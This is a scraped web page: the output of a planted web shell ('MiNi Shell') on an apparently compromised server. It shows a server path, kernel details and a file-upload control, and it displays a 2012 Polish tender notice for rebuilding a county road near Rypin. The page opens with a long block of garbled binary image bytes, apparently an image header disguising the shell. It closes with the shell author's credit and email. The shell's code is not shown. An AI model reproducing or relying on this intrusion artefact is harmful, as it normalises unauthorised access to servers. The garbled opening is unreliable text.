JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120214/43794-N-2012.html

<p class="kh_header"><b>Rypin: Przebudowa drogi powiatowej nr 2214C Rypin -Pręczki  od km 0+000 do km 3+000 (odc. Rypin - Kowalki)</b><br>
<b>Numer ogłoszenia: 43794 - 2012; data zamieszczenia: 14.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Mławska 50, 87-500 Rypin, woj. kujawsko-pomorskie, tel. 054 2803404 (05), faks 054 2803405.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej nr 2214C Rypin -Pręczki  od km 0+000 do km 3+000 (odc. Rypin - Kowalki).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy zamówienia:
 Karczowanie drzew i krzewów 
1) Karczowanie krzewów  - m2 700
2) Karczowanie drzew       - szt  14 
Wzmocnienie poboczy  na szer. 50cm w miejscach, gdzie nie występuje chodnik  
1) Wykonanie koryta na wzmocnieniu prawostronnym na gł. 25cm - m2 1048,50 
2) Wykonanie warstwy wzmacniającej pobocza gr. 20cm z kam. wapiennego 0/32mm - m2    
   1048,50
3) Wykonanie ścinki poboczy na gr. 10cm - m2 1048,50 
Podbudowa - korekta szerokości konstrukcji - poszerzenie
1) Wykonanie w-wy podbudowy z kamienia wapiennego o gr. w-wy 30cm - m2 655,00
2) Wykonanie koryta na jezdni na głębokość 20cm - m2 655,00
Nawierzchnia 
1) Wykonanie warstwy profilowej w ilości 100kg/m2 i 75 kg/m2 -  Mg  1280,48
2) Ułożenie geosiatki  100kN/mb - m2 655,00
3) Wykonanie warstwy wiążącej gr.4cm z BA  - m2 10124,02
4) Wykonanie warstwy ścieralnej  gr. 4 cm  z BA   -  m2  15414,00
Zjazdy, skrzyżowania
1) Zjazdy z kostki betonowej gr. 8cm  - m2 441,79
2) Zjazdy z masy bitumicznej gr. 5cm z BA   - m2  681,07
3) Wykonanie  przepustów pod zjazdami z rur PP średnicy 40 cm - m 90,00
4) Wykonanie typowych ścianek czołowych przepustu śr. 40 cm -  szt 20
Oznakowanie pionowe, poziome ; poręcze , oświetlenie salarowo - hybrydowe
1) Demontaż znaków drogowych  - szt. 30,00 
2) Ustawienie znaków drogowych odblaskowych  - szt .32
3)Ustawienie poręczy sprężystych stalowych typ SP04
-	proste        - m  24,00 ,  najazdowe  - m 16,00
4) Ustawienie poręczy ochronnych łańcuchowych - m 20
5) Oznakowanie poziome jezdni
-	przejścia dla pieszych - m2 20,00  (na skrzyżowaniu z drogą wojewódzką nr 557 i przy szkole gimnazjum m. Kowalki)
   -      ciągłe -  m2     9,60    (m. Kowalki - przy szkole)
6) Ustawienie oświetlenia z solarowo-hybrydowym zasilaniem, ustawieniem słupa na    
    fundamencie, wbudowaniem akumulatora, regulatora wraz z montażem i z zastosowaniem   
    turbiny wiatrowej   - szt 1  
Odwodnienie , ściek
1) Wykonanie kolektora z rur PP śr.400mm (przedłużenie) - m 40,00
2) Wykonanie wpustów ulicznych krawężnikowo - jezdniowych pod chodnikiem -szt 8 / mb     
   20,00
3) Wykonanie ścieku przykrawężnikowego z prefabrykatów bet 50x15cm - m 60,00
4) Wykonanie przedłużenia przepustu śr. 100cm  - m 6,00
5) Wykonanie typowych ścianek czołowych przepustu śr. 100cm - m3 16,00
6) Odtworzenie rowów przydrożnych - m 1450,00
Budowa ciągu pieszo-rowerowego od km 0+000 do km 2+300
1) Wykonanie nawierzchni chodnika z kostki betonowej 6cm - m2 4416,00
2) Ustawienie obrzeży betonowych 30x8cm - m  2165,00
3) Ustawienie krawężnika betonowego 15x30cm na ławie bet. z oporem - m  2147,00 
Zatoki  autobusowe
1) Budowa zatok autobusowych z kostki betonowej czerwonej gr. 8 cm m2 144,10 (przy  szkole m.Kowalki)  
2) Wykonanie nawierzchni chodnika w obrębie zatok autobusowych - m2 112,00
 Przebudowa chodnika i zjazdów - m. Kowalki
1) Rozebranie zniszczonych chodników z płyt betonowych 35x35cm i 50x50cm - m2 959,80
2) Wykonanie nawierzchni chodnika z kostki betonowej gr. 6cm (szara) - m2 959,80
3) Rozebranie zjazdów z trylinki - m2 202,40	
4) Wykonanie nawierzchni z kostki betonowej gr. 8cm (czerwona)  na zjazdach- m2 218,90
5) Rozebranie krawężników na ławie betonowej - m 635,00
6) Ustawienie krawężnika betonowego na ławie z oporem z B-10  - m 493,00
7) Regulacja wysokościowa urządzeń obcych  -  szt. 33/ m3 5,15
Droga Nr 2218C znajduje się na terenie Gminy Miasta Rypin i Gminy Rypin, powiat rypiński, województwo kujawsko-pomorskie.
  8.   Szczegółowy zakres rzeczowy robót określają:
a)	kosztorys ofertowy  
b)	przedmiar robót wraz z obliczeniem powierzchni robót - zał. nr 11
            c)   uproszczona dokumentacja techniczna - dostępna w siedzibie Zarządu Dróg    
                  Powiatowych w Rypinie
d)	szczegółowe specyfikacje techniczne wykonania i odbioru robót.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.31.42-6, 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium 
	do dnia 29.02.2012 r. do godz. 10:00,  w wysokości 50.000,00 zł słownie pięćdziesiąt tysięcy i 00 100 złotych. Wadium wnosi się przed upływem terminu składania ofert. Wadium może być wnoszone w jednej lub kilku następujących formach
   1 pieniądzu
   2 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
       kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
   3 gwarancjach bankowych
   4  gwarancjach ubezpieczeniowych
   5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy        
       z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości     
       Dz.U. Nr 109, poz. 1158, z późn. zm.
2  W przypadku składania przez Wykonawcę wadium w formie gwarancji gwarancja    
     powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać   
     następujące elementy
     nazwę dającego zlecenie Wykonawcy, beneficjenta gwarancji Zamawiającego     
      gwaranta  banku lub instytucji ubezpieczeniowej udzielających gwarancji oraz     
      wskazanie ich siedzib
    - określenie wierzytelności, która ma być zabezpieczona gwarancją
    - kwotę gwarancji
    - termin ważności gwarancji
    - zobowiązanie gwaranta do bezzwłocznego zapłacenia kwoty gwarancji na pierwsze     
      pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego      
      ofertę wybrano odmówił podpisania umowy na warunkach określonych w  ofercie, lub
      nie wniósł zabezpieczenia należytego wykonania umowy, lub zawarcie umowy stało się    
      niemożliwe z przyczyn leżących po stronie wykonawcy
      stwierdzenie, że gwarancja jest bezwarunkowa i nieodwołalna.
3  Wadium w formie pieniężnej należy wnieść na rachunek bankowy  Zarządu Dróg     
      Powiatowych w Rypinie prowadzony w  Banku BGŻ nr  
25 2030 0045 1110 0000 0187 0300 z adnotacją
     Wadium w postępowaniu na  Przebudowę drogi powiatowej nr 2214C Rypin - Pręczki  od km 0+000 do km 3+000 odc. Rypin - Kowalki
 4 Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty    
     najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego      
     oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy.     
    a Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający     
        zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego     
        oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia    
        żądano. 
5 Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę     
     przed upływem terminu składania ofert.
6 Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami     
     wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,     
     pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej                      
     za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
7  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta      
     została wybrana
    odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach       
     określonych w ofercie
    nie wniósł wymaganego zabezpieczenia należytego wykonania umowy
    zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn       
     leżących po stronie wykonawcy.
 8 Zamawiający zatrzymuje również wadium wraz z odsetkami, jeżeli wykonawca       
     w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył    
     dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba     
     że udowodni, że wynika to z przyczyn nieleżących po jego stronie</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1W zakresie tego warunku wykonawca wykaże, że posiada uprawnienia
             do wykonywania określonej działalności lub czynności związanej z przedmiotem            
             zamówienia,
2	Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń potwierdzających spełnienie warunków udziału w postępowaniu według formuły spełnia nie spełnia określony warunek.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wiedzy i doświadczenia Wykonawca powinien         
             wykazać, że w ciągu ostatnich pięciu lat przed wszczęciem postępowania, a jeżeli   
             okres działalności jest krótszy - w tym okresie minimum dwa zadania o wartości co    
             najmniej 2 000 000,00 zł każda  dwie  roboty budowlane  z zakresu robót    
             drogowych :przebudowy, budowy lub remontu  dróg , z podaniem ich wartości oraz    
             daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty     
             zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a	Potencjał techniczny.
Na potwierdzenie spełnienia warunku dysponowania odpowiednim potencjałem technicznym Wykonawca winien wykazać dysponowanie następującymi zasobami
 wymagania minimalne  

Lp.	Rodzaj sprzętu	Minimalna liczba jednostek
	Koparka o poj. łyżki min. 0,4 m3	3
	Frezarka do bitumu	1
	Skrapiarka	1
	Samochody samowyładowcze	Wg potrzeb technologicznych
	Układarka mas bitumicznych z elektronicznym sterowaniem	1
	Walce drogowe	3
	Zagęszczarki	2
	Wytwórnia mas bitumicznych	1
Wytwórnia mas bitumicznych, z której dostarczana będzie mieszanka mineralno-asfaltowa i SMA powinna być zlokalizowana w odległości umożliwiającej dostarczenie masy na budowę i wbudowanie przy zachowaniu wymaganej temperatury wbudowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b	Potencjał kadrowy.
Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien wykazać
par.	1 osobę do pełnienia funkcji kierownika budowy , kierownika robót drogowych, która spełnia następujące wymagania
	minimalne kwalifikacje  uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności drogowej.
                              Kierownik budowy lub kierownik robót muszą być członkami odpowiedniej           
                              Terytorialnie Okręgowej Izby Inżynierów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Wykonawca winien wykazać posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej     z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty, kosztorys ofertowy, wykaz części zamówienia do powierzenia podwykonawcom, wypełnić lub wpisać NIE DOTYCZY ,zobowiązania do współpracy lub dyspozycji wypełnić lub wpisać NIE DOTYCZY ,pełnomocnictwo w przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, umowa konsorcjum jeśli dotyczy, umowa spółki cywilnej  jeśli dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień zawartej umowy w przypadku wystąpienia
     okoliczności, których nie można było przewidzieć w chwili zawarcia umowy w    
     następujących  przypadkach:
   a)  zmiany kluczowego personelu Zamawiającego lub Wykonawcy, w tym zmiana
        kierownika budowy (robót) - spełniającego wymagania zawarte w siwz / po uzgodnieniu     
        z Zamawiającym,
   b)  wystąpienia niekorzystnych warunków atmosferycznych powodujących konieczność
        przerwania robót. Zamawiający dopuszcza możliwość przedłużenia terminu   
        przewidzianego  na realizację zamówienia, o ilość dni w których te warunki wystąpią   
        (opady, zbyt niskie temperatury),
  c)  wystąpienia okoliczności, których Strony umowy nie były w stanie przewidzieć, pomimo
       zachowania należytej staranności np.:
      - w następstwie, wykraczających poza terminy określone w KPA, procedur   
        administracyjnych oraz innych terminów formalno - prawnych mających wpływ na   
        termin realizacji umowy,
      - pisemnego żądania wstrzymania prac skierowanego do Wykonawcy przez   
        Zamawiającego  lub wydania zakazu prowadzenia prac przez organ administracji    
        publicznej, o ile żądanie lub wydanie zakazów nie nastąpiło z przyczyn, za które    
        Wykonawca ponosi odpowiedzialność,
3.     W przypadkach wystąpienia opóźnień, strony ustalą nowe terminy. Zmiany terminu
        wymagają aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.rypinski.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zarządu Dróg Powiatowych w Rypinie , ul. Strażacka 1 , 87-500 Rypin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.02.2012 godzina 10:00, miejsce: siedziba Zamawiającego w Rypinie, ul. Strażacka 1, pokój nr 3 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com